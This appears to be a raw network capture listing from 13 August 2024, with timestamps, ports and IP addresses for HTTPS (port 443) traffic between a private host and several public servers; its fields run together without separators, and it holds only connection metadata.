                            Aug 13, 2024 21:58:05.003834963 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.003876925 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.005305052 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005347967 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005362034 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.005367994 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005390882 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005398035 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.005403996 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005422115 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.005461931 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.005469084 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.006325960 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.006378889 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.006387949 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.006438971 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.085764885 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.085833073 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.086354971 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.086406946 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.087044001 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.087090969 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.087090969 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.087105036 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.087127924 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.087147951 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.088022947 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.088074923 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.088840961 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.088891983 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.088897943 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.089540958 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.089587927 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.089596033 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.089637041 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.089687109 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.089732885 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.090383053 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.090435982 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.091162920 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.091217041 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.091948986 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.092005014 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.092617035 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.092670918 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.092824936 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.092873096 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.093497992 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.093545914 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.093554020 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.093590975 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.093595028 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.093638897 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.094281912 CEST59191443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.094294071 CEST44359191188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.217499018 CEST59186443192.168.2.6104.21.81.207
                            Aug 13, 2024 21:58:05.224596024 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.224658012 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.224791050 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.225142956 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.225162029 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.260122061 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.260163069 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.260225058 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.260504007 CEST44359186104.21.81.207192.168.2.6
                            Aug 13, 2024 21:58:05.260602951 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.260624886 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.487894058 CEST44359186104.21.81.207192.168.2.6
                            Aug 13, 2024 21:58:05.488003969 CEST44359186104.21.81.207192.168.2.6
                            Aug 13, 2024 21:58:05.488387108 CEST59186443192.168.2.6104.21.81.207
                            Aug 13, 2024 21:58:05.489615917 CEST59186443192.168.2.6104.21.81.207
                            Aug 13, 2024 21:58:05.489633083 CEST44359186104.21.81.207192.168.2.6
                            Aug 13, 2024 21:58:05.714643955 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.716780901 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.716814041 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.717896938 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.717958927 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.719044924 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.719225883 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.719230890 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.719295025 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.771569014 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.771593094 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.793633938 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.793909073 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.793943882 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.794986963 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.795049906 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.795365095 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.795433044 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.795559883 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.795569897 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:05.815149069 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.815198898 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.815228939 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.815262079 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.815277100 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.815287113 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.815313101 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.815330982 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.815344095 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.818258047 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.818485022 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.818495035 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.821229935 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.821285963 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.821293116 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.824352026 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.824393988 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.824409008 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.824424982 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.824515104 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.849685907 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:05.901623011 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.901757956 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.901787043 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.901873112 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.901936054 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.901994944 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902046919 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.902062893 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902108908 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.902229071 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902483940 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902508974 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902532101 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.902546883 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.902597904 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.903181076 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904547930 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904582024 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904594898 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.904608965 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904654026 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904707909 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.904720068 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.904772043 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.910008907 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.910089970 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.910156965 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.910172939 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.910707951 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.910806894 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.910819054 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.911685944 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.911725998 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.911770105 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.911784887 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.911822081 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.911844969 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.961726904 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.988122940 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988322973 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988419056 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988450050 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.988461018 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988501072 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.988532066 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988682032 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988775969 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988823891 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.988831043 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.988928080 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.990339041 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.990359068 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.990401983 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.990432024 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.990437984 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.990453959 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.990473986 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.991509914 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.991559982 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.991596937 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.991604090 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.991642952 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.991712093 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:05.991792917 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.996695042 CEST59192443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:05.996731043 CEST44359192151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:06.147706032 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147763014 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147804976 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147831917 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147845030 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.147869110 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147888899 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.147907019 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.147944927 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.147953987 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.148194075 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.148253918 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.673003912 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.673038006 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.673283100 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.674413919 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.674428940 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.817110062 CEST59193443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:06.817132950 CEST44359193188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:06.875978947 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:06.876032114 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:06.876090050 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:06.876512051 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:06.876535892 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.168265104 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:07.202332020 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:07.202347040 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:07.203675032 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:07.205836058 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:07.206048012 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:07.206407070 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:07.252504110 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:07.335264921 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.348196983 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.348229885 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.352147102 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.352216959 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.378200054 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.378324032 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.378602982 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.378628016 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.428118944 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.473292112 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473375082 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473403931 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473434925 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473440886 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.473472118 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473488092 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.473511934 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473542929 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473555088 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.473560095 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.473598003 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.475501060 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.478194952 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.478236914 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.478250980 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.478265047 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.478316069 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.478328943 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.519150972 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.561224937 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561240911 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561275959 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561294079 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.561301947 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561310053 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561335087 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.561347961 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.561364889 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.561386108 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.564641953 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.564667940 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.564726114 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.564733028 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.564781904 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.646528006 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.646555901 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.646606922 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.646631002 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.646665096 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.646681070 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.648286104 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.648303986 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.648360968 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.648367882 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.648407936 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.649009943 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.649070024 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.649075031 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.649091959 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:07.649137020 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.649384975 CEST59195443192.168.2.6151.101.2.137
                            Aug 13, 2024 21:58:07.649396896 CEST44359195151.101.2.137192.168.2.6
                            Aug 13, 2024 21:58:08.764384985 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764432907 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764460087 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764487028 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.764498949 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764513016 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764538050 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.764568090 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764604092 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.764616966 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764708042 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.764743090 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.764750957 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.765055895 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.765094995 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.765101910 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.811033010 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.811062098 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.856033087 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.856488943 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857032061 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857084036 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.857100010 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857815027 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857857943 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857862949 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.857877970 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857916117 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857923985 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.857934952 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.857994080 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.858165026 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.858258963 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.858293056 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.858299017 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.858305931 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.858345032 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.858352900 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859177113 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859214067 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859232903 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.859240055 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859282017 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.859288931 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859361887 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.859401941 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.859410048 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860150099 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860272884 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.860280991 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860352039 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860383987 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860395908 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.860403061 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.860445023 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.860451937 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.861969948 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.862023115 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.862030983 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.902221918 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.953892946 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.953943968 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.953975916 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954016924 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954030991 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954046965 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954087973 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954096079 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954118967 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954133987 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954164028 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954169989 CEST44359194188.114.96.3192.168.2.6
                            Aug 13, 2024 21:58:08.954210997 CEST59194443192.168.2.6188.114.96.3
                            Aug 13, 2024 21:58:08.954338074 CEST44359194188.114.96.3192.168.2.6
